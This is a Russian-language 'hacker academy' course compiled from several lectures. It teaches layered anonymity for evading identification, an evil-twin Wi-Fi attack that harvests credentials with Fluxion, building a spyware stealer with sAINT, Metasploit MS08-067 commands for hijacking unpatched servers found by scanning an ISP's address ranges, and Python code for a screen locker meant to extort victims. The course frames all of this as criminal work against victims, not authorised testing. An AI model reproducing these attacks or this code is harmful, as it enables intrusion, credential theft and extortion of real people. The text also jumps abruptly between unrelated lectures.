image

Всем салют, дорогие друзья!


Hacker Place Academy открывает Вам свои двери и мы надеемся, что знания полученные в её стенах кардинально изменят жизнь каждого из вас. Погнали!

 

ПОГРАММА ОБУЧЕНИЯ “HACKER PLACE ACADEMY”


Безопасность и Анонимность

- Настройка и использование вирусов

Обучение мы начнем с самого главного для любого хакера. Поскольку вы уже здесь, то догадались, что наш первый раздел:


image

«БЕЗОПАСНОСТЬ И АНОНИМНОСТЬ»


image

РАЗДЕЛ ВКЛЮЧАЕТ В СЕБЯ ТАКИЕ ТЕМЫ, КАК:


Дебаты о анонимности и способов ее реализации никогда не утихают на формах даркнета. А все это из-за разных потребностей и разных моделей угроз. Представим, что ты хочешь оставить гневный коммент о правительстве в соц. сети и при этом не сесть. Что же для этого нужно? SSH-туннель? Может быть Tor или VPN? А может быть все сразу? НЕТ! Достаточно неприметно одеться, а может даже перестраховаться и нацепить очки или шарф, заботливо связанный бабулей. Далее мы отправляемся на крупный рынок вашего города и покупаем SIM-карту и Б/У смартфон, чем старше – тем лучше. Далее мы едем в самый дальний уголок вашего города, там включаем смартфон и делаем свои делишки, после благополучно там же его и уничтожаем.

Можно спать спокойно. Анонимность с оценкой «отлично».


Но что если тебе нужно не просто оставить разовый комментарий, не просто скрыть свой IP-адрес от какого-то сайта? Что если необходим такой уровень анонимности,

который составит сложнейшую головоломку и практически не даст возможности для раскрытия на любом уровне? А также сможет скрыть и сам факт использования средств анонимизации. Именно об этом мы и поговорим.

Идеальная анонимность, как и все идеальное — это скорее утопия, но приблизиться к ней вплотную ты сможешь спокойно, потому что ты поступил в наш университет.

Происходит это все за счет множества различных слоев защиты. Когда одна технология начинает дополнять и усиливать другую, и даже когда для твоей идентификации применяются отпечатки параметров системы и другие методы, ты по- прежнему остаешься неотличимым от общей массы пользователей сети. В данном разделе мы научим тебя, как этого добиться.


Для начала разделим анонимность на 4 уровня:


    1. Базовый уровень защиты

    2. Средний уровень защиты

    3. Высокий уровень защиты

    4. God’ mode (Режим Бога)


Давайте разберем каждый из них подробнее.


Базовый уровень защиты


Базовый уровень безопасности и анонимности, выглядит так:

клиент VPN/TOR/SSH-тунель цель.


Схема базового уровня - это лишь продвинутая альтернатива прокси, позволяющая просто подменить IP. Один шаг, один клик и о анонимности тут говорить не придется. Уже не придется. Одна неверная или дефолтная настройка пресловутого WebRTC и ваш реальный IP уже известен. Данный тип защиты уязвим и перед компрометацией узла, и перед fingerprints и перед простым анализом логов у провайдера и в дата центре.


Часто на просторах Телеграмм встречаются статьи, воспевающие частный VPN, представляя его лучше чем публичный, т.к. человек уверен в своей настройке системы. Давайте на секунду представим, кому-то известен твой внешний IP, соответственно известен и дата центр, соответственно дата центру известно, какому серверу этот IP принадлежит. Сложно ли на месте, установить с какого реального IP к этому серверу подключались? Если ты там один клиент? Ответ очевиден. Когда клиентов, например 100, 1000 - тут уже все намного сложнее.


Это даже не касаясь аспектов, что редкий человек, заморочится на шифрованные диски и защиту от выемки, врятли бы даже заметил, если его сервер перезагрузят с

init level 1 и включат логи на VPN, описав это как «небольшие технические проблемы в дата центре». Да и разве это вообще нужно, если известны все входящие адреса на сервер и исходящие с него же?


Что же касается Tor, во-первых, его использование напрямую может вызывать подозрение, а во-вторых, выходные ноды, которых около 1000 штук известны и многие из них забанены, для многих сайтов это как красная тряпка. Например в Cloudflare есть возможность в Firewall'e разрешать или принимать подключения из сети Tor. В качестве страны следует использовать T1. Кроме того, использование Tor намного медленнее VPN (Скорость в сети Тор на данный момент не превышает 10 мбит, а часто находится на уровне 1-3 мбит).


Итог: Если вам нужно просто не носить по миру свой открытый паспорт и обходить простейшие запреты на сайты, иметь хорошую скорость соединения и возможность полностью пускать весь трафик через другой узел, то следует выбрать VPN. И на эту роль лучше подходит платный сервис, за те же деньги, что вы отдали бы за свой VPS, в 1-й стране, который еще нужно настроить и как-никак поддерживать, вы получите десятки стран и сотни или даже тысячи выходных IP.


В этом случае нет смысла использовать Tor, но в каких-то случаях и Tor является хорошим решением, особенно, если существует еще дополнительный слой безопасности, такой как VPN или SSH-туннель. Но об этом дальше.


Средний уровень защиты


Средний уровень безопасности и анонимности, выглядит так:

Клиент VPN Тор цель


Это оптимальный и рабочий инструмент, для любого, не безразличного к подмене IP- адреса человека, это именно тот случай, когда сочетание технологий усилило каждую из них. Но не стоит питать иллюзий, да, узнать твой реальный адрес, будет затруднительно, но ты по-прежнему подвержен всем тем же атакам, что и выше. Твое слабое место — это твое физическое место работы, твой компьютер.


Высокий уровень защиты


Высокий уровень безопасности и анонимности, выглядит так:

Клиент VPN Удаленное рабочее место (через RDP/VNC) VPN цель


Рабочий компьютер должен быть не твой, а удаленный, например, на Windows 8, с Firefox, парой плагинов вроде Flash, парой кодеков, [ВНИМАНИЕ] никаких уникальных шрифтов и прочих плагинов. Скучный и неотличимый от миллионов других в сети. И

даже в случае какой-либо утечки или компрометации твоей системы, ты все равно остаешься прикрыт еще одним VPN'ом


Раньше считалось, что высокий уровень анонимности достигался путем использования Tor/VPN/SSH/Socks, но не сегодня. Поэтому обязательно добавляем еще и использование удаленного рабочего места в эту схему.


God’ mode (Режим Бога)


Клиент Double VPN (в разных дата центрах, но рядом друг с другом) Удаленное рабочее место + Виртуальная машина VPN цель


Предлагаемая схема - это первичное подключение к VPN и вторичное подключение к VPN (на случай, если 1-й VPN будет скомпрометирован, через какую либо утечку), для скрытия трафика от провайдера и с целью не выдать свой реальный IP-адрес в дата центре с удаленным рабочим местом. Далее установленная виртуальная машина на этом сервере. Зачем нужна виртуальная машина я думаю понятно?

- Чтобы каждую загрузку делать откат к самой стандартной и банальной системе, со стандартным набором плагинов. Именно на машине с удаленным рабочим местом, а не локально. Люди, которые использовали виртуальную машину локально, а из под нее TripleVPN на эллиптических кривых, однажды зайдя на whoer.net, очень удивились увидеть в графе WebRTC свой реальный и настоящий IP-адрес. Какую ловушку реализуют завтра, обновя тебе браузер, не знает никто, главное не держи ничего локально. Кевин Митник это 30 лет назад уже знал.


Данная схема неоднократно использовалась в наших делах. Тормоза — приличные, даже если географически вся схема составлена правильно. Но терпимые. В данном случае, подразумевается, что человек не разносит сервера на пути по разным континентам.

Допустим ты физически находишься в Москве, так и строй схему так, чтобы первый VPN тоже был в Москве, второй, например, в Милане, а удаленное рабочее место, например, в Италии и конечный VPN, например, в Беларуси. Логика построения должна быть такой, что не стоит использовать все сервера внутри, например, еврозоны. Все дело в том, что там хорошо налажено сотрудничество и взаимодействие различных структур, но при этом не стоит их разносить далеко друг от друга. Соседние государства, ненавидящие друг-друга — вот залог успеха твоей цепочки!


Что бы быть ультра-неуязвимым - можно еще добавить автоматическое посещение веб-сайтов в фоновом режиме, с твоей реальной машины как имитацию серфинга, чтобы не было подозрения, что ты используешь какое-то средство анонимизации. Так

как трафик идет лишь к одному IP-адресу и через один порт. Можно добавить использование ОС Whonix/Tails, получать доступ в интернет через публичный Wi-Fi в кафе (практически все пароли есть в приложении Wi-Fi Map), при этом обязательно поменяв данные сетевого адаптера, которые тоже могут привести к деанонимизации. Если дело очень серьезное, то есть необходимость сменить внешность (вспоминаем про очки, бабушкин шарф и даже накладные усы и парики), чтобы не быть идентифицированы по лицу в том же самом кафе. Уже внедрены технологии, позволяющие делать. К сожалению, это будущее и оно уже здесь. Ты можешь быть определен, как по наличию координат местонахождения, в файле фотографии, сделанной твоим телефоном до диагностики определенного стиля письма. Просто помни об этом.


Fingerprints, как и попытки определения использования VPN, по средствам замера времени отправления пакета от пользователя к вебсайту и от вебсайта к IP-адресу пользователя (не берем в расчет такой «костыль» как блокировка только входящих запросов определенного вида) обойти не так просто. Обмануть кое-что можно, одну- другую проверку, но нет гарантий, что завтра не появится очередное «зло». Именно поэтому тебе необходимо удаленное рабочее место, именно поэтому нужна чистая виртуалка, именно поэтому это лучший совет, который можно дать, на данный момент. Cтоимость такого решения может начинаться всего лишь от 40$ в месяц. Но учти, что для оплаты, следует использовать исключительно крипту.


Самая важная часть и самый главный залог успеха в защите анонимности — разделение работы с персональными данными и с данными секретными, представляющими какую-то ценность. Все эти туннели и выстроенные схемы, будут абсолютно бесполезны, если ты с нее зайдешь, например, в свой почтовый ящик или ВК.


Поговорим о подмене MAC-адреса своего сетевого адаптера. Это понадобится, например, если ты будешь использовать свой ПК для подключения к публичному Wi-Fi, для целей указанных в разделе «God’ mode (Режим Бога)»


Каждый сетевой интерфейс, подключенный к сети — будь то маршрутизатор, беспроводное устройство или сетевая карта, — имеет уникальный MAC-адрес. Эти адреса, иногда называемые физическими или аппаратными адресами, устанавливаются заводом-изготовителем, но обычно можно их изменять при помощи программного обеспечения.


Давайте начнём с совсем простого — пусть WiFite всё делает сама.


Автоматизированный взлом Wi-Fi в WiFite


Для этого программу WiFite нужно запустить с двумя дополнительными опциями:

Моя wifi подходит?

Проверьте вывод команды iw list, найдите там данные вроде таких:

image

Важными строками являются AP и monitor, если одна из них отсутствует, ваша wifi карта, скорее всего, не подходит. Если нужен совет, какую карту купить, то смотрите ниже.

Атака Captive Portal не создаёт точку доступа

Самая частая причина этого в том, что драйвер не поддерживает виртуальные интерфейсы. Атака Captive Portal в Fluxion может использовать виртуальный интерфейс для симуляции наличия второго беспроводного адаптера: один используется для глушения целевой точки доступа, а второй используется для создания точки доступа «evil twin», т.е. Злого Двойника. Примером сравнительно популярного драйвера, не поддерживающего виртуальный интерфейс, является realtek-rtl88xxau-dkms.

Мне нужно войти (на Android)

Это то, как скрипт работает. Фальшивый перехватывающий портал настроен самим скриптом для сбора учётных данных. Это не глюк – это так и надо.

MAC-адрес фальшивой точки доступа отличается от оригинальной

MAC-адрес фальшивой точки доступа отличается на один октет от оригинальной чтобы предотвратить деаутентификацию клиентов, которую выполняет сам fluxion во время атаки.

Почему все мои интерфейсы фиолетовые/негативные(-)?

Интерфейсы с символом отрицания в настоящее время используются другими процессами.

Чтобы принудительно остановить использование занятых интерфейсов, запустите fluxion с флагом FLUXIONWIKillProcesses:

image

А что если я хочу запустить fluxion с несколькими флагами?

Разделите флаги разделителями команд (двоеточиями ';'):


image

Где рукопожатия?

Вы найдёте все сохранённые рукопожатия в папке fluxion/attacks/Handshake Snooper/handshakes

Привет, дорогие друзья!


В этой лекции мы продолжим знакомится с необъятными возможностями Kali Linux.

Сегодня я покажу вам как собрать свой стиллер бесплатно, используя Kali Linux.


Погнали!


Стилер (от английского to steal, воровать) — определенный класс троянов (малвари, вирусов - как хотите), функционал которых состоит из кражи сохраненных в системе паролей и отправка их "автору".


Стилер, пользуясь наивностью, залазит в хранилища часто используемых программ и нагло тырит оттуда все логины, пароли и т.п. Следующий, он же последний этап работы программ данного класса — отправка вкусняшек злоумышленнику. Вот как-то так всё это и работает.


Но сегодня мы с вами не ограничимся кражей паролей и пойдем еще дальше! Итак, что же сможет наш стиллер и какие функции будет иметь?

KeyLogger

  1. Скриншот экрана

  2. Воруется файл, если человек в нем что то редактирует. 4. Фотография с Web-Камеры

У нашего стиллера есть единственный минус - он работает только с установленной java на компе. Т.e. если у жертвы на компе не установлен java, вирус не будет работать.

Но есть хорошая новость. Когда жертва запустит приложение, будет окно, предупреждающее что java не установлена и откроется страница установки.


image


image

image



image


sAINT — генератор spyware для систем Windows, написанный на Java


Особенности


 

Основные команды Linux. Нужно знать как таблицу умножения!


Привилегии

sudo command — запустить команду как root sudo -s — открыть оболочку root

sudo -s -u user — открыть оболочку как пользователь

sudo -k — восстановить пароль sudo

gksudo command — визуальный диалог sudo (GNOME) kdesudo command — визуальный диалог sudo (KDE) sudo visudo — редактировать /etc/sudoers

gksudo nautilus — корневой файловый менеджер (GNOME) kdesudo konqueror — корневой файловый менеджер (KDE) passwd — изменить ваш пароль


Сеть


ifconfig — показать информацию о сети

iwconfig — показать информацию о беспроводной сети

sudo iwlist scan — поиск беспроводных сетей

sudo /etc/init.d/networking restart — перезапустить сеть

/etc/network/interfaces — файл для ручной настройки сети

ifup interface — включить интерфейс

ifdown interface — отключить интерфейс


ping host - пропинговать host и вывести результат

whois domain - получить информацию whois для domain wget file - скачать file

ifconfig eth0 - показать конфигурацию сетевого интерфейса eth0 ifup eth0 - активировать интерфейс eth0

ifdown eth0 - деактивировать интерфейс eth0

ifconfig eth0 192.168.1.1 netmask 255.255.255.0 - выставить интерфейсу eth0 ip-адрес и маску подсети


ifconfig eth0 promisc - перевести интерфейс eth0 в promiscuous-режим для "отлова" пакетов (sniffing)

 

ifconfig eth0 -promisc - отключить promiscuous-режим на интерфейсе eth0


dhclient eth0 - активировать интерфейс eth0 в dhcp-режиме.

route -n - вывести локальную таблицу маршрутизации

route add -net 0/0 gw IP_Gateway - задать ip-адрес шлюза по умолчанию (default gateway)


route add -net 192.168.0.0 netmask 255.255.0.0 gw 192.168.1.1 - добавить статический маршрут в сеть 192.168.0.0/16 через шлюз с ip-адресом 192.168.1.1


route del 0/0 gw IP_gateway - удалить ip-адрес шлюза по умолчанию (default gateway)


echo "1" > /proc/sys/net/ipv4/ip_forward - разрешить пересылку пакетов (forwarding)


hostname - отобразить имя компьютера

ip link show - отобразить состояние всех интерфейсов

mii-tool eth0 - отобразить статус и тип соединения для интерфейса eth0

ethtool eth0 - отображает статистику интерфейса eth0 с выводом такой информации, как поддерживаемые и текущие режимы соединения


netstat-tupn - отображает все установленные сетевые соединения по протоколам TCP и UDP без разрешения имён в ip-адреса и PID'ы и имена процессов, обеспечивающих эти соединения


netstat-tupln - отображает все сетевые соединения по протоколам TCP и UDP без разрешения имён в ip-

адреса и PID'ы и имена процессов, слушающих порты


tcpdump tcp port 80 - отобразить весь трафик на TCP-порт 80 (обычно - https)


iwlist scan - просканировать эфир на предмет, доступности беспроводных точек доступа


iwconfig eth1 - показать конфигурацию беспроводного сетевого интерфейса eth1


cat /proc/net/dev - показать сетевые интерфейсы и статистику по ним

dig domain – получить DNS информацию domain


Дисплей


sudo /etc/init.d/gdm restart — перезапустить X и вернуться к авторизации (GNOME)

sudo /etc/init.d/kdm restart — перезапустить X и вернуться к авторизации (KDE)


/etc/X11/xorg.conf — файл настроек экрана

sudo dexconf — сбросить конфигурацию xorg.conf Ctrl+Alt+Bksp — перезапустить X-сервер, если завис Ctrl+Alt+FN — переключиться на интерфейс командной строки

Ctrl+Alt+F7 — переключиться обратно на графический интерфейс пользователя


Системные службы


start service — начать работу службы (Upstart)

stop service — остановить работу службы (Upstart)

status service — проверить, запущена ли служба (Upstart)

/etc/init.d/service start — запустить службу (SysV)

/etc/init.d/service stop — остановить службу (SysV)

/etc/init.d/service status — проверить статус службы (SysV)

 

/etc/init.d/service restart — перезапустить службу (SysV)

runlevel — получить текущий уровень запуска


Брандмауэр


ufw enable — включить брандмауэр

ufw disable — выключить брандмауэр

ufw default allow — разрешить все соединения по умолчанию ufw default deny — запретить все соединения по умолчанию ufw status — текущий статус и правила

ufw allow port — разрешить трафик на порт

ufw deny port — заблокировать порт

ufw deny from ip — заблокировать IP-адрес


Управление пакетами


apt-get update — обновить доступные обновления

apt-get upgrade — обновить все пакеты

apt-get dist-upgrade — обновить версию Ubuntu apt-get install pkg — установить пакет (pkg)

apt-get purge pkg — удалить пакет (pkg)

apt-get autoremove — удалить устаревшие пакеты

apt-get -f install — попробовать исправить битые пакеты dpkg —configure -a — попробовать исправить битые пакеты dpkg -i pkg.deb — установить файл pkg.deb

/etc/apt/sources.list — файл со списком APT репозиториев


Имена приложений


nautilus — файловый менеджер (GNOME) dolphin — файловый менеджер (KDE) konqueror — веб-браузер (KDE)

kate — текстовый редактор (KDE)

gedit — текстовый редактор (GNOME)


Система


Восстановление — нажмите и удерживайте Alt+SysRq (PrintScrn), затем с паузами в одну секунду, нажимайте клавиши R, E, I, S, U, B для безопасной перезагрузки системы

lsb_release -a — получить версию ОС

uname -r — получить версию ядра

uname -a — получить всю информацию о ядре


Системная информация


arch - отобразить архитектуру компьютера

cat /proc/cpuinfo - показать информацию о ЦПУ

cat /proc/meminfo - проверить использование памяти

df - информация об использовании дисков

hdparm -i /dev/hda - вывести характеристики жесткого диска

lspci -tv - показать в виде дерева PCI устройства

lsusb -tv - показать в виде дерева USB устройства

 

uptime - показать время работы с момента включения

uname -a - показать информацию о ядре clock -w - сохранить системное время в BIOS shutdown -h now - Остановить систему shutdown -r now - перегрузить систему logout - выйти из системы


Файловые команды

cd /home - перейти в директорию '/home'

cd .. - перейти в директорию уровнем выше

cd ../.. - перейти в директорию двумя уровнями выше

cd - перейти в домашнюю директорию

cd ~user - перейти в домашнюю директорию пользователя user

cd - - перейти в директорию, в которой находились до перехода в текущую директорию

pwd - показать текущюю директорию

ls - отобразить содержимое текущей директории

ls -F - отобразить содержимое текущей директории с добавлением к именам символов, храктеризующих тип

ls -l - показать детализированое представление файлов и директорий в текущей директории

ls -a - показать скрытые файлы и директории в текущей директории ls *[0-9]* - показать файлы и директории содержащие в имени цифры tree - показать дерево файлов и директорий, начиная от корня (/) mkdir dir1 - создать директорию с именем 'dir1'

mkdir dir1 dir2 - создать две директории одновременно

mkdir -p /tmp/dir1/dir2 - создать дерево директорий

rm -f file1 - удалить файл с именем 'file1'

rmdir dir1 - удалить директорию с именем 'dir1'

rm -rf dir1 - удалить директорию с именем 'dir1' и рекурсивно всё её содержимое

rm -rf dir1 dir2 - удалить две директории и рекурсивно их содержимое mv dir1 new_dir - переименовать или переместить файл или директорию cp file1 file2 - сопировать файл file1 в файл file2

cp dir/* - копировать все файлы директории dir в текущую директорию

cp -a /tmp/dir1 - копировать директорию dir1 со всем содержимым в текущую директорию

cp -a dir1 dir2 - копировать директорию dir1 в директорию dir2


Пользователи и группы

whoami - имя, под которым вы залогинены

groupadd group_name - создать новую группу с именем group_name

groupdel group_name - удалить группу group_name


groupmod -n new_group_name old_group_name - переименовать группу old_group_name в new_group_name


useradd -c "Nome Cognome" -g admin -d /home/user1 -s /bin/bash user1 - создать пользователя user1, назначить ему в качестве домашнего каталога /home/user1, в качестве shell'а /bin/bash, включить его в группу admin и добавить комментарий Nome Cognome.


useradd user1 - создать пользователя user1

userdel -r user1 - удалить пользователя user1 и его домашний каталог


usermod -c "User FTP" -g system -d /ftp/user1 -s /bin/nologin user1 - изменить атрибуты пользователя


passwd - сменить пароль

passwd user1 - сменить пароль пользователя user1 (только root)

chage -E 2005-12-31 user1 - установить дату окончания действия учётной записи пользователя user1 pwck - проверить корректность системных файлов учётных записей. Проверяются

файлы /etc/passwd и /etc/shadow

 

grpck - проверяет корректность системных файлов учётных записей. Проверяется файл /etc/group


newgrp [-] group_name - изменяет первичную группу текущего пользователя. Если указать "-", ситуация будет идентичной той, в которой пользователь вышил из системы и снова вошёл. Если не указывать группу, первичная группа будет назначена из /etc/passwd.


Установка пакетов


apt-get istall application_name - установить приложение application_name


Установка из исходников:


./configure make

make install


dpkg -i pkg.deb - установить пакет (Debian)


Привилегированный запуск приложений


sudo <command> - запуск команды под именем привилегированного пользователя

gksu <command> - тоже самое, разница в том что появляется графическое окно с просьбой ввести пароль в обоих случаях вводится пароль вашего текущего пользователя.


image

ХАКИНГ [ЛЕКЦИЯ 6]


В этой лекции я покажу тебе метод добычи удаленного дедика под управлением Windows средствами Metasploit Framework с использованием уязвимости MS08-

067. Почему-то эксплуатация этого бага в настоящее время пользуется большой популярностью среди хакеров, о чем свидетельствуют многочисленные записи и обсуждения в Facebook , хотя на страницах ВКонтакте, посвященных тому же самому MSF , царит полная тишина. В большинстве случаев уязвимыми являются все системы, работающие под управлением Windows XP Professional SP2 и SP3 (полный список операционок, подверженных риску, ты можешь найти на kb.cert.org/vuls/id/827267). Но на самом деле, все программные продукты Microsoft могут быть скомпрометированы путем эксплуатации данного бага и по сей день.

Перейдем к делу — качаем последний релиз Metasploit Framework на официальном сайте metasploit.com (или ищем на диске). Перед его установкой на компьютере отключаем антивирус. В комплект Metasploit Framework включен свой собственный сетевой сканер портов, хотя для поиска подключенных к сети машин под управлением ОС Windows мы можем использовать и внешний сканер nmap, который также добавлен в дистрибутив и устанавливается одновременно с Metasploit Framework.

  1. Запускаем сканер nmap, отметив порт 445, поскольку именно он нам и нужен для дальнейшей эксплуатации уязвимости службы сервера. А что, собственно, мы будем сканировать? Ответ достаточно прост — например, можно взять и просканировать IP-префиксы своего провайдера, которые мы с легкостью узнаем на сайте bgp.he.net в разделе «Prefixes IP v4».

    Для использования полученных префиксов в сканере nmap, необходимо их предварительно скопировать в файл — например, my_isp.txt, и поместить файл в рабочий каталог с nmap.

  2. Команда запуска сканера будет выглядеть следующим образом:


    nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt


    Отлично, в результате сканирования мы получили список хостов с запущенной службой сервера, которую видно из внешней сети, причем она ничем не прикрыта, хотя Microsoft еще в 2008 году настоятельно рекомендовали блокировать доступ из интернета к этому сервису… Интересно, что по каждому хосту nmap выдает подробную информацию о типе установленной ОС.


    Виды shell: полезная нагрузка meterpreter и другие


    В настоящее время считается, что полнофункциональный Meterpreter (МР) существует только под Windows, но на самом деле это не совсем так. Существует еще несколько версий MP, реализованных на PHP и JAVA. Впрочем, ты и сам можешь стать автором «полезной нагрузки» — например, скомпилировать TCL- сценарий shell-кода для Cisco IOS с помощью утилиты tclpro.exe и в дальнейшем использовать его для жестоких игр с железными кошками

    Стандартную полезную нагрузку MP можно использовать почти со всеми Windows-эксплойтами, включенными в Metasploit Framework, выбрав одну из следующих полезных нагрузок:

    Кратко поясню суть каждой.


    1. bind_meterpreter— резервирует порт на целевой машине и ожидает соединения. После установления соединения происходит загрузка Meterpreter’a на целевой хост, текущее соединение продолжает использоваться для связи с удаленной машиной.

    2. reverse_meterpreter— сама соединяется с предварительно заданным хостом по указанному порту для дальнейшей загрузки Meterpreter’a. Затем установленное соединение используется для связи с удаленной машиной. Все хорошо, но для успешной реализации данного метода нам понадобится

      реальный IP-адрес (или устанавливай проброс нужных тебе портов через NAT).

    3. find_tag— осуществляет поиск дескриптора службы, обработанной эксплойтом, и использует его для загрузки Meterpreter’a на удаленную машину, после чего существующее соединение будет использовано для связи с ней. Этот вид полезной нагрузки является особенно интересным, поскольку тут не требуется открывать новое соединение — таким образом, существует возможность обхода практически любых конфигураций брандмауэров.

    4. bind_tcp— это обычный командный интерпретатор типа cmd.exe, естественно, без всяких дополнительных наворотов, как у Meterpreter`a. Он просто резервирует порт на целевой машине и загружает стандартную оболочку.

В зависимости от цели исследования системы может быть использована любая из этих полезных нагрузок. Так чего же мы ждем? Выбираем цель из списка, полученного в результате сканирования nmap, и подключаемся к ней. Для простоты эксперимента будем использовать простой командный интерпретатор в качестве полезной нагрузки.


msf > use exploit/windows/smb/ms08_067_netapi


msf exploit> set PAYLOAD windows/vncinject/bind_tcp


PAYLOAD => windows/vncinject/bind_tcp


msf exploit(ms08_067_netapi) > set RHOST 192.168.0.3


RHOST => 192.168.0.3


msf exploit(ms08_067_netapi) > exploit


Если уязвимость на удаленной машине существует, то мы получим доступ к шеллу (cmd.exe) этого компьютера, и в окне появится сообщение о том, что

сессия успешно установлена. В случае, когда msf определил ОС как Windows 7, можно попробовать использовать 64-разрядные полезные нагрузки, которые имеются в соответствующем разделе (ищем через меню GUI), или вызвать нагрузку через консоль. Пример работы эксплойта с полезной нагрузкой можно посмотреть на видео (ищи ролик на нашем диске).


Захват сервера


Теперь из списка хостов, сгенерированных nmap, выберем IP-адрес под управлением ОС Windows 2003 Server — это и будет наша искомая цель (ведь ты, как настоящий сетевой гуру, хотя бы раз в жизни должен поиметь свой собственный дедик!). Для работы с сервером будем использовать все тот же эксплойт (exploit/windows/smb/ms08_067_netapi) и полезную нагрузку bind_meterpreter. В результате мы получаем доступ к командной оболочке через Meterpreter, после чего добавляем нового пользователя с помощью сценария token_adduser, предварительно повысив свои привилегии на удаленной машине до уровня SYSTEM с помощью команды use priv. Ну вот — у нас есть дедик, к которому ты можешь подключаться, используя удаленный рабочий стол. На нем мы можем установить прокси-сервер, FTP и многоемногое другое. В ходе эксперимента у меня получилось набрать пять дедиков примерно в течение часа. Я думаю, это круто!


Заключение


Если кто-то хочет просто жать на кнопку «exploit», чтобы Metasploit сразу выдавал готовые дедики, то скажу сразу — этого не будет: метод все равно требует времени и терпения.

Атака из локальной сети, скорее всего, приведет к тому, что система будет полностью скомпрометирована. Несмотря ни на что, все еще остается довольно широкое поле для экспериментов с безопасностью Windows, и ты можешь внести свой вклад в это дело


 

РАЗДЕЛ «ВИРУСОЛОГИЯ»

Термин "компьютерный вирус" появился на 7-й конференции по безопасности информации (1984,США): впервые его употребил Фред Коэн - сотрудник Лехайского университета (США). В 1986 году на компьютерном конгрессе в Гамбурге были продемонстрированы несколько разновидностей вирусов. Лавина стала набирать скорость. По оценке еженедельника Computer World c 1991 года число вирусов, циркулирующих в мире, увеличилось на 500, всего же их разновидностей около 10 тысяч. Ущерб, наносимый компьютерными вирусами, также быстро возрастает, а их опасность для таких жизненно важных систем, как оборона, транспорт и связь поставила проблему компьютерных вирусов в ряд тех, которые обычно находятся под пристальным вниманием органов государственной безопасности. Отмечается быстрый рост числа компьютерных вирусов отечественного производства. Не преследуемое законом свободное копирование программного обеспечения создает для вирусов хорошую питательную среду.


2 ноября 1988 года произошло крупнейшее событие из когда-либо случавшихся нарушений безопасности американских компьютерных систем. 23-летний студент выпускного курса Корнельского университета Роберт Таппан Моррис запустил в компьютерную сеть ARPAnet программу, представлявшую собой редкую разновидность компьютерных вирусов, так называемых "сетевых червей". В результате атаки был полностью или частично заблокирован ряд общенациональных сетей. Среди них - CSnet, NSFnet, BITnet, уже упомянутая ARPAnet и ее военная несекретная составляющая Milnet). Всего так или иначе пострадало примерно 6200 компьютерных систем, включая системы крупнейших университетов, правительственных лабораторий, частных фирм, военных баз, клиник, NASA, агентства национальной безопасности, Лос-Аламосской национальной лаборатории, исследовательских центров ВМС США. Общий ущерб достиг по некоторым оценкам 100 миллионов долларов.


"Вирусом" Морриса была сложная 60-килобайтная программа, способная раскрывать пароли и маскироваться подзадачи легальных пользователей.


Специалисты, нейтрализовавшие и деассемблировавшие программу, единодушно отметили выдающееся мастерство Роберта Морриса как программиста и исключительное знание им архитектуры целевых систем. В ходе судебного разбирательства выяснилось, что "вирус" задумывался и разрабатывался в качестве исследовательской работы, и если бы не досадная ошибка в механизме размножения, то случившегося бы не произошло. Неоспоримо доказано, что обвиняемый не имел преступных намерений. Целью работы было вовсе не блокирование сетей, а выяснение масштаба глобальной сетевой инфраструктуры.

Компьютерным вирусом называется специально написанная программа, способная самопроизвольно присоединяться к другим программам, создавать свои копии и внедрять их в файлы, системные области компьютера и в вычислительные сети с целью нарушения работы программ, порчи файлов и каталогов, создания всевозможных помех в работе на компьютере.


Причины появления и распространения компьютерных вирусов, с одной стороны, скрываются в психологии человеческой личности и ее теневых сторонах (зависти, мести, тщеславии непризнанных творцов, невозможности конструктивно применить свои способности), с другой стороны, обусловлены отсутствием аппаратных средств защиты и противодействия со стороны операционной системы персонального компьютера.

Начнем курс вирусологии с написания простого WinLocker’a на Python


Мы с вами напишем локер для компьютера, на базе Windows или UNIX систем. Наша программа будет блокировать систему пользователя, пока он не введет пароль. В простонародье данный вирус называют "WinLocker"


Переходим на официальный сайт PythonА - ТЫК. Скачиваем последнюю версию и устанавливаем ее.


image

Наш вирус будет работать по такому принципу: Программа открывается на весь экран,у нее нет кнопки закрыть. Доступно поле для ввода пароля и кнопка для разблокировки. Пока жертва не введет правильный пароль,мышка будет постоянно кликать на кнопку,и переводить туда курсор. Это будет мешать пользователю свернуть окно или убить его через диспетчер задач. Так же будет таймер отсчитывающий время до удаления системы. На самом деле,он ничего не удалит, но хорошо припугнут жертву и например заставит скорее перевести деньги. По истечении времени таймер сменится на надпись - "Удаление системы" Вот и вся суть программы)


Начинаем кодить


Комментарии к коду будут помечены #комментарий


Для написания вы можете использовать обычный IDLE от питона, или любой другой. Для начала мы должны к нашей программе подключить нужные нам библиотеки.


*Библиотека - написанные коды/функции,которые подключаются к нашей программе.


image


Но при запуске нам выдаст ошибку,указывающую на отсутствие библиотек pyautogui и pygame. Они не являются стандартными и их нужно установить. Для этого выполняем действия как на видео(через систему для установки пакетов мы ставим нужные нам библиотеки)


Видео 1 - https://vimeo.com/268192990 (обновление pip) Видео 2 - https://vimeo.com/268193211 (установка pyautogui) Видео 3 - https://vimeo.com/268411868 (установка pygame)


ДАЛЬШЕ МЫ ЗАДАДИМ ПЕРЕМЕННЫЕ, КОТОРЫЕ МЫ БУДЕМ ИСПОЛЬЗОВАТЬ.


image


image

Почти в самом начале мы должны создать функции. Которые будут отвечать за блокировку компьютера и за проверку на ввод правильного пароля.

Сначала создаем функцию блокировки компьютера.


image

Теперь мы создаем функцию, которая проверяет, введен ли правильный пароль.


image

Дальше мы должны создать окно нашего локера,которое откроется на весь экран.

screen=Tk() #screen - это просто название переменной. Которой мы присваиваем ему создания окна приложения

screen.title("WinLock vlmi.su") #задаем нашему окну название/заголовок. screen.attributes("-fullscreen",True) #задаем окну атрибут - "на весь экран",который является правдой/активным.

screen.configure(background="#1c1c1c") #устанавливаем фоновой цвет на наше окно. pyautogui.FAILSAFE=False #отключение остановки библиотеки autogui при дерганьи мышки. Если не включить это, то при дергание мышки pyautogui просто прекратит выполнять все действия.

Теперь мы создадим объекты для нашей программы - кнопку,поле для ввода надписи.

field=Entry(screen,fg="green",justify=CENTER) #создаем переменную,которая равняется полю для ввода,которое расположено на нашем окне(screen),цвет для текста - зеленый, текст будет по центру.

but=Button(screen,text="Разблокировать") #создаем переменную,которая равняется кнопке,которая расположена на нашем окне(screen),и имеет на себе надпись("Разблокировать")

text0=Label(screen,text="Ваша система заблокирована!",font="TimesNewRoman 30",fg="white",bg="#1c1c1c") #создаем переменную,которая равняется надписи,имеет свой текст, шрифт и размер, цвет текста фона.

